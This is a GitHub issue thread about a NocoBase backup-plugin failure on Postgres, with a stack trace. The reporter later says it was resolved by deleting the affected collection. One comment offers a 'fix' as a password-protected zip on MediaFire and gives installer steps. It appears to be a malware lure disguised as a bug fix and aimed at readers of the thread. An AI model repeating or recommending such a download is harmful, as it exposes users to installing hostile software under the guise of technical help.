### ISSUE TITLE
Backup failed

### ISSUE THREAD

**Issue by pehua** [nocobase/nocobase#5134]
## * Describe the bug

When I try to do a backup in backup & restore plugin, I get this error

`2024-08-26 11:44:06 [info]  dumping collection componentes               module=application app=mantenimientotmb reqId=e6b04703-8e7d-4647-9fab-673a68a7b7fd dataSourceKey=main
TypeError: Cannot read properties of null (reading '1')
    at _PostgresQueryInterface.getAutoIncrementInfo (D:\Nocobase_Respaldo\NodeJSPortable\Data\nocobase-TMB\node_modules\@nocobase\database\lib\query-interface\postgres-query-interface.js:88:31)
    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
    at async Dumper.dumpCollection (D:\Nocobase_Respaldo\NodeJSPortable\Data\nocobase-TMB\node_modules\@nocobase\plugin-backup-restore\dist\server\dumper.js:367:28)
    at async Dumper.dump (D:\Nocobase_Respaldo\NodeJSPortable\Data\nocobase-TMB\node_modules\@nocobase\plugin-backup-restore\dist\server\dumper.js:219:7)`

## * Environment

- NocoBase version: v1.2.12-alpha

- Database type and version: postgres 16.2
  

- OS: Windows 10

- Deployment Methods: node

- Docker image version:

- NodeJS version: 
Node v20.11.0
NPM 10.4.0
yarn run v1.22.21

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pehua** [comment]
Fixed, just deleted the collection.
